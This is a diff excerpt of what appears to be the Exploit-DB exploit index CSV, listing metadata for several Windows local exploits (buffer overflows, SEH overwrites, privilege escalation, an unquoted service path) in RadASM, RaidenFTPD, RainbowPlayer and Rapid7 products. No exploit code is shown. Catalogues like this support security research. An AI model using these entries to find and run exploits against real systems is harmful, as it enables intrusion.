@ -41178,6 +41186,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8177,exploits/windows/local/8177.py,"RadASM 2.2.1.5 - '.rap' Local Stack Overflow",2009-03-09,zAx,local,windows,,2009-03-08,,1,OSVDB-50417,,,,,
7334,exploits/windows/local/7334.pl,"RadASM 2.2.1.5 - '.rap' WindowCallProcA Pointer Hijack",2008-12-03,DATA_SNIPER,local,windows,,2008-12-02,,1,OSVDB-50417,,,,,
11400,exploits/windows/local/11400.py,"RadASM 2.2.1.6 - '.rap' Universal Buffer Overflow",2010-02-11,Dz_attacker,local,windows,,2010-02-10,,1,,,,,http://www.exploit-db.comRadASM_2.2.1.6.zip,
51611,exploits/windows/local/51611.py,"RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)",2023-07-20,"Andre Nogueira",local,windows,,2023-07-20,2023-07-20,0,,,,,,
8193,exploits/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,local,windows,,2009-03-09,,1,OSVDB-52534,,,,,
40145,exploits/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Local Privilege Escalation",2016-07-25,LiquidWorm,local,windows,,2016-07-25,2016-07-25,1,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5344.php
48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,,2020-09-14,2020-09-14,0,,,,,,

Can't render this file because it is too large.